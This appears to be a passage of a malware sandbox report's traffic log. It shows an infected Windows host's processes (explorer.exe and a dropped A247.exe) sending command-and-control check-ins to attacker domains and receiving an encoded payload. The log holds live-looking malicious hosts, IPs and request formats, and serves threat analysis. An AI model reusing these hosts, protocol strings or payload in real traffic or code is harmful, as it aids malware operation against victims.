May 26, 2024 10:33:05.584328890 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ovxmwniqpjexkcks.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: dbfhns.in
May 26, 2024 10:33:05.584328890 CEST	127	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 18 f0 97 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuzanpvr4e>zL
May 26, 2024 10:33:06.552989960 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49782	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:10.602930069 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qvvhbwqetcr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: dbfhns.in
May 26, 2024 10:33:10.602962017 CEST	233	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 4b df ed Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu>KDfvM<c^/w0cDDPGg-$XW<p/',^IwDlC$8CYpDFi[=/
May 26, 2024 10:33:11.670233965 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49783	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:15.562340021 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://umfomwabnghpfpsy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: dbfhns.in
May 26, 2024 10:33:15.562364101 CEST	206	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 40 e3 fd Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuB@jno+gSamq\dTi `=S:ZI19&%}+#0rP~3PNi
May 26, 2024 10:33:16.535130024 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49784	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:21.922976971 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frlbymqtkyyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: dbfhns.in
May 26, 2024 10:33:21.922993898 CEST	215	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 43 bf fa Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu\Cxw\AK5H?v4zXSeqlJ1)B@>0)4@d6N<{7G\ztUwMV
May 26, 2024 10:33:23.141372919 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49785	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:26.674968958 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmuwkpviysjlmpaf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: dbfhns.in
May 26, 2024 10:33:26.674968958 CEST	341	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 1b b1 f7 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuUpsdN-s,ojAgI]K)K[ Dsw1 *y}]QEA`0;]2(shhBZk3I
May 26, 2024 10:33:27.631942034 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49786	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:31.550599098 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://olwhnfqjomykugd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: dbfhns.in
May 26, 2024 10:33:31.550621986 CEST	261	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 3c b2 88 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu}<N0OtAVu0\]qfY]$\|MS4y>8(`"oZX_\S#5Du"bouFh#EB4uZ+r
May 26, 2024 10:33:32.494678974 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49787	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:38.557470083 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sgvkxotchkel.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: dbfhns.in
May 26, 2024 10:33:38.557492971 CEST	216	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 2b cf 92 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuX+mn]t6\t<O~\t+-b<f4Jbh;YDB^N]Z;XK?_])^'s&o@
May 26, 2024 10:33:40.434873104 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
May 26, 2024 10:33:40.440481901 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
May 26, 2024 10:33:40.440512896 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49788	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:44.583910942 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oosdileuucnskppc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: dbfhns.in
May 26, 2024 10:33:44.583935976 CEST	200	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 32 e6 9b Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vuC2\|_CBZu^kO/G]6:9Hb0Cg}&4'oWn!W'$`T:<
May 26, 2024 10:33:45.554656029 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49789	88.225.215.104	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:33:50.615201950 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://caudwrxwdlvda.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: dbfhns.in
May 26, 2024 10:33:50.615231037 CEST	285	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 53 fc f8 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu@SE\j26c9==:hp;w'{C_.9N/iNXVD$R;l$vB7 O3q}IhAJ7T/(/
May 26, 2024 10:33:51.583678007 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:33:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49719	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:29 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-26 08:30:30 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fk2t3jrnd6149mbvai5lcr85t1; expires=Thu, 19-Sep-2024 02:17:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EEkDbDomlNPvIbIl4nlL%2BaEnoiQb%2FYzTtdn7xunrYZKhiriBkpYUMnlcqJ3PyiSXFkVBz8US7PROzR70y4l3yq9tB1WUNk1bXhNiqemlZ9sFkO10vd4YF4ApK2Uh8b0OZXv07OckNP45cjQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c67498d7242b1-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:30 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-26 08:30:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49721	188.114.96.3	443	6204	C:\Users\user\AppData\Local\Temp\A247.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:30:30 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: whispedwoodmoodsksl.shop
2024-05-26 08:30:30 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34 Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
2024-05-26 08:30:31 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 08:30:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8qq0c530jdru7v1e46n8d62jgj; expires=Thu, 19-Sep-2024 02:17:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17XT5P5cyXwORargo1BNvVJUlDUBD8vfbogEjOi%2B3L38C4TSBQiIUQjgBXfyMpYw9hsoL0ghaKrerwPKgRS7Bim%2BLdaPPv2ws9C7%2Bptq7uXOQzgZUaN47ZeKjPgywVdUmKxBM5K8dWQv6eU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 889c67523ecac335-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 08:30:31 UTC	559	IN	Data Raw: 31 64 39 30 0d 0a 2b 4b 50 33 4b 4c 69 55 77 7a 32 79 44 41 36 62 67 45 55 6a 54 51 57 49 4a 71 46 2f 62 30 54 58 34 39 74 46 48 49 41 2b 51 4b 2b 44 67 59 45 4b 67 71 44 76 48 38 46 70 4c 4b 48 30 4e 31 59 6f 4b 61 70 48 78 56 31 56 49 72 61 50 71 43 41 77 6f 6c 73 34 6a 63 4c 34 6a 41 72 64 2b 75 45 48 6b 47 6c 6b 2b 65 45 70 51 53 78 75 35 31 62 4e 48 41 63 6f 73 49 75 2b 4a 6e 6a 68 55 69 33 4b 6e 63 61 57 51 74 62 39 72 6c 58 66 4c 69 4b 35 35 54 38 42 64 79 66 46 51 39 55 65 49 69 57 6b 69 50 6b 34 4d 50 73 63 4a 63 48 61 6d 64 56 4a 33 66 61 76 57 39 5a 6e 5a 76 50 6f 49 55 41 70 62 2f 68 50 78 78 63 48 4a 72 4f 4b 74 43 39 73 37 46 67 71 77 5a 76 4d 6c 67 71 55 74 71 5a 48 6b 44 59 73 71 74 41 6b 55 44 35 79 35 31 54 46 58 52 4a 6f 72 4d 47 2b 4b Data Ascii: 1d90+KP3KLiUwz2yDA6bgEUjTQWIJqF/b0TX49tFHIA+QK+DgYEKgqDvH8FpLKH0N1YoKapHxV1VIraPqCAwols4jcL4jArd+uEHkGlk+eEpQSxu51bNHAcosIu+JnjhUi3KncaWQtb9rlXfLiK55T8BdyfFQ9UeIiWkiPk4MPscJcHamdVJ3favW9ZnZvPoIUApb/hPxxcHJrOKtC9s7FgqwZvMlgqUtqZHkDYsqtAkUD5y51TFXRJorMG+K
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 59 4f 44 67 5a 4a 47 6d 71 37 68 55 64 56 68 66 76 6a 77 49 6b 38 39 61 2b 39 43 7a 68 34 44 4a 72 43 47 74 43 6c 34 35 56 38 71 79 5a 76 50 6d 55 44 5a 38 71 49 66 6e 69 35 72 34 61 4a 2f 41 52 35 6b 37 6b 50 52 48 67 4e 6d 71 73 2b 67 5a 33 6e 75 48 48 71 4e 6b 4d 65 59 51 39 48 78 71 56 50 43 5a 57 50 36 36 79 42 48 4a 57 54 69 54 73 55 54 44 43 47 77 68 71 73 70 64 65 39 66 4b 4d 76 61 6a 39 56 4e 77 72 62 35 48 2f 35 74 66 65 2f 51 4a 46 41 2b 4a 2f 55 4b 32 6c 30 4b 4b 76 58 5a 2b 53 35 32 37 56 45 76 78 35 54 45 6d 45 50 62 39 36 78 5a 32 32 39 6b 38 65 59 67 51 53 74 71 35 55 72 44 45 77 55 6a 73 59 75 77 5a 7a 43 69 57 7a 71 4e 77 6f 47 6c 52 39 62 36 71 6c 4f 51 63 53 4c 67 6f 69 42 4e 62 7a 2b 71 54 63 73 53 41 43 75 2f 6a 37 77 71 64 2b 4e 64 Data Ascii: YODgZJGmq7hUdVhfvjwIk89a+9Czh4DJrCGtCl45V8qyZvPmUDZ8qIfni5r4aJ/AR5k7kPRHgNmqs+gZ3nuHHqNkMeYQ9HxqVPCZWP66yBHJWTiTsUTDCGwhqspde9fKMvaj9VNwrb5H/5tfe/QJFA+J/UK2l0KKvXZ+S527VEvx5TEmEPb96xZ229k8eYgQStq5UrDEwUjsYuwZzCiWzqNwoGlR9b6qlOQcSLgoiBNbz+qTcsSACu/j7wqd+Nd
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 53 57 52 4e 54 78 74 78 2f 50 49 48 57 35 35 53 73 42 64 79 66 68 52 4d 38 61 42 53 43 78 69 62 59 6f 64 2f 42 64 4c 73 4f 49 78 70 56 44 31 50 6d 74 56 74 31 70 59 66 4c 6f 4b 6b 55 6f 5a 71 6f 4b 67 78 6f 56 5a 75 33 42 6a 7a 64 7a 37 6e 49 70 77 5a 4f 42 69 67 54 44 74 71 5a 54 6b 44 59 73 2f 65 34 76 53 79 42 75 34 45 37 4d 46 41 30 75 76 49 69 36 4a 33 4c 6b 58 53 37 42 6c 38 53 57 54 39 66 7a 6f 56 50 58 61 57 32 35 72 47 64 47 4e 79 65 79 42 50 4d 51 41 53 32 35 77 34 77 6b 63 4f 78 62 4e 49 32 46 6a 34 77 4b 33 66 72 68 42 35 42 68 62 66 54 6f 4c 45 38 6a 5a 75 70 41 77 42 63 4e 4b 62 43 48 73 53 35 2b 38 46 73 74 7a 4a 76 4b 6e 6b 66 55 38 36 42 61 31 79 34 69 75 65 55 2f 41 58 63 6e 78 32 33 35 58 52 4a 6f 72 4d 47 2b 4b 7a 36 36 48 43 62 48 6d Data Ascii: SWRNTxtx/PIHW55SsBdyfhRM8aBSCxibYod/BdLsOIxpVD1PmtVt1pYfLoKkUoZqoKgxoVZu3Bjzdz7nIpwZOBigTDtqZTkDYs/e4vSyBu4E7MFA0uvIi6J3LkXS7Bl8SWT9fzoVPXaW25rGdGNyeyBPMQAS25w4wkcOxbNI2Fj4wK3frhB5BhbfToLE8jZupAwBcNKbCHsS5+8FstzJvKnkfU86Ba1y4iueU/AXcnx235XRJorMG+Kz66HCbHm
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 56 2f 61 51 66 6e 69 35 72 34 61 4a 2f 41 52 35 6b 2f 46 50 54 45 55 30 35 2b 35 6a 35 49 48 4b 69 42 47 4c 4d 69 4d 75 66 52 4e 2f 35 70 46 7a 66 61 57 48 2f 37 69 31 49 4a 32 48 6c 54 64 45 65 41 53 69 79 6a 37 55 70 63 2b 68 66 4c 34 33 55 67 5a 4a 53 6d 71 37 68 63 39 64 6a 51 76 4c 75 49 41 45 77 4b 66 4d 45 78 42 46 4e 66 76 57 4e 73 79 74 33 34 6c 55 6e 78 5a 48 49 6b 45 76 52 38 36 4a 5a 33 57 46 6c 36 2b 67 6b 54 79 78 72 35 6b 4c 43 48 68 38 75 76 4d 48 33 5a 33 6e 36 48 48 71 4e 75 38 2b 59 58 74 33 6d 34 55 43 65 64 79 7a 2b 37 6d 63 5a 62 32 54 72 53 38 41 63 41 43 43 38 69 62 6b 68 65 2b 31 52 4c 4d 71 64 77 5a 68 45 31 66 43 70 55 74 78 6c 59 76 44 6b 4a 30 41 6c 4a 36 51 45 78 41 56 4e 66 76 57 78 75 69 64 2b 2b 52 77 39 67 34 4f 42 6b 6b Data Ascii: V/aQfni5r4aJ/AR5k/FPTEU05+5j5IHKiBGLMiMufRN/5pFzfaWH/7i1IJ2HlTdEeASiyj7Upc+hfL43UgZJSmq7hc9djQvLuIAEwKfMExBFNfvWNsyt34lUnxZHIkEvR86JZ3WFl6+gkTyxr5kLCHh8uvMH3Z3n6HHqNu8+YXt3m4UCedyz+7mcZb2TrS8AcACC8ibkhe+1RLMqdwZhE1fCpUtxlYvDkJ0AlJ6QExAVNfvWxuid++Rw9g4OBkk
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 54 5a 41 67 4c 50 37 36 5a 78 6c 76 55 65 31 55 30 78 35 50 46 36 4f 43 72 79 78 7a 37 68 77 39 67 34 4f 42 6b 6b 61 61 72 75 46 5a 33 32 64 76 39 75 4d 75 54 53 4a 69 34 30 48 43 47 77 6b 73 76 34 47 2f 49 58 2f 6e 56 69 48 4d 6b 4d 69 53 51 74 33 31 73 78 2b 65 4c 6d 76 68 6f 6e 38 42 42 6d 44 34 53 74 4e 64 45 6d 69 73 77 62 34 72 50 72 6f 63 4a 73 65 56 78 5a 4a 47 33 50 4f 6e 55 74 46 68 62 66 6e 74 49 30 6f 6d 59 65 74 4a 78 68 41 4a 4e 4c 2b 4b 74 69 74 33 37 6c 46 69 67 39 72 47 6a 51 71 43 74 70 42 53 33 6d 42 72 37 36 49 34 44 7a 59 6e 37 55 69 44 52 55 30 6e 75 59 36 36 4b 48 33 68 58 53 6a 66 69 4d 32 63 51 74 2f 36 71 6c 48 57 66 47 72 32 36 79 52 43 4a 6d 44 69 53 4d 6b 65 43 6d 62 37 77 62 34 2f 50 72 6f 63 41 64 71 4b 7a 4e 56 56 6c 4f 2f Data Ascii: TZAgLP76ZxlvUe1U0x5PF6OCryxz7hw9g4OBkkaaruFZ32dv9uMuTSJi40HCGwksv4G/IX/nViHMkMiSQt31sx+eLmvhon8BBmD4StNdEmiswb4rProcJseVxZJG3POnUtFhbfntI0omYetJxhAJNL+Ktit37lFig9rGjQqCtpBS3mBr76I4DzYn7UiDRU0nuY66KH3hXSjfiM2cQt/6qlHWfGr26yRCJmDiSMkeCmb7wb4/ProcAdqKzNVVlO/
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 6d 54 36 34 69 4e 46 4b 47 4c 70 53 4d 67 61 44 69 6d 78 69 4c 63 75 63 61 49 53 59 73 71 43 67 63 30 4b 2b 2b 32 69 55 39 30 75 63 37 66 37 5a 30 59 6a 4a 37 49 45 7a 78 4d 49 4a 72 2b 48 76 53 4a 34 36 46 6b 69 78 70 6e 4f 6b 55 7a 65 2b 61 46 55 32 57 39 71 2f 4f 67 73 52 79 4a 6b 37 45 4b 44 55 30 30 68 72 63 48 68 5a 31 37 35 55 53 37 4b 32 74 37 62 55 35 72 78 72 52 2b 49 4c 6d 66 31 35 69 42 42 49 6d 54 69 51 63 63 58 43 43 61 39 6b 37 45 6e 65 66 42 4f 49 73 53 66 7a 5a 5a 4b 33 76 43 6f 57 64 4e 71 4c 4c 65 69 49 46 6c 76 50 36 70 70 7a 78 6f 6b 49 61 37 42 70 6d 6c 6e 6f 6c 73 75 6a 63 4b 42 6c 45 48 51 2b 61 78 63 31 6d 31 6e 2f 4f 67 6d 52 69 64 71 2b 45 66 4d 45 67 6b 6d 75 6f 65 2f 4a 6e 48 6b 57 79 76 4d 6b 73 62 56 42 4a 72 78 75 52 2b 49 Data Ascii: mT64iNFKGLpSMgaDimxiLcucaISYsqCgc0K++2iU90uc7f7Z0YjJ7IEzxMIJr+HvSJ46FkixpnOkUze+aFU2W9q/OgsRyJk7EKDU00hrcHhZ175US7K2t7bU5rxrR+ILmf15iBBImTiQccXCCa9k7EnefBOIsSfzZZK3vCoWdNqLLeiIFlvP6ppzxokIa7BpmlnolsujcKBlEHQ+axc1m1n/OgmRidq+EfMEgkmuoe/JnHkWyvMksbVBJrxuR+I
2024-05-26 08:30:31 UTC	172	IN	Data Raw: 70 33 44 32 39 6a 2b 77 53 62 54 56 39 39 34 4e 4c 75 64 79 7a 39 45 6a 75 4e 6a 49 48 4e 47 4a 53 32 73 78 2b 49 4c 69 76 36 38 44 56 48 4c 48 48 70 41 2f 30 6a 49 79 47 7a 68 4c 34 33 50 4d 78 58 4e 73 72 61 6a 39 56 46 6d 71 36 59 48 35 67 75 55 37 65 69 50 77 46 33 4a 39 39 48 7a 52 4d 4b 4d 4b 54 4d 6c 79 42 34 35 31 73 79 6a 37 54 4b 67 55 32 61 75 4f 46 5a 6b 44 59 38 74 36 49 6a 55 47 38 2f 75 68 61 59 53 46 35 78 35 64 4f 6d 61 57 65 69 53 6d 4b 56 79 49 2f 56 57 4a 71 75 34 52 6a 54 66 48 37 2f 0d 0a Data Ascii: p3D29j+wSbTV994NLudyz9EjuNjIHNGJS2sx+ILiv68DVHLHHpA/0jIyGzhL43PMxXNsraj9VFmq6YH5guU7eiPwF3J99HzRMKMKTMlyB451syj7TKgU2auOFZkDY8t6IjUG8/uhaYSF5x5dOmaWeiSmKVyI/VWJqu4RjTfH7/
2024-05-26 08:30:31 UTC	1369	IN	Data Raw: 31 34 30 38 0d 0a 34 54 46 43 61 46 6e 55 52 39 55 51 41 69 32 30 76 34 63 4a 63 2b 4e 66 4c 49 2b 72 31 35 68 61 32 66 4f 6d 59 65 35 67 61 2b 33 6c 4b 55 63 76 4a 36 51 45 7a 46 31 56 48 2f 58 4a 2b 52 67 77 6f 6b 52 69 6c 64 72 30 6c 6b 54 55 38 62 64 4f 6e 55 31 36 39 4f 30 73 51 47 38 70 71 6b 4b 44 52 56 31 6f 39 59 57 6f 5a 79 61 79 44 6e 6d 59 79 5a 62 46 47 4d 57 34 75 42 2f 47 4c 6a 53 72 72 47 64 54 62 7a 2b 71 41 38 30 51 44 43 57 37 67 71 73 31 65 4f 46 4b 49 59 71 6b 2f 37 52 48 30 66 71 73 55 4e 74 51 55 74 6a 76 4c 45 30 69 61 4f 46 36 2f 51 67 4f 4b 4c 75 47 72 7a 59 2b 72 42 77 74 6a 63 4c 34 31 51 4b 61 79 65 38 66 79 43 34 30 75 64 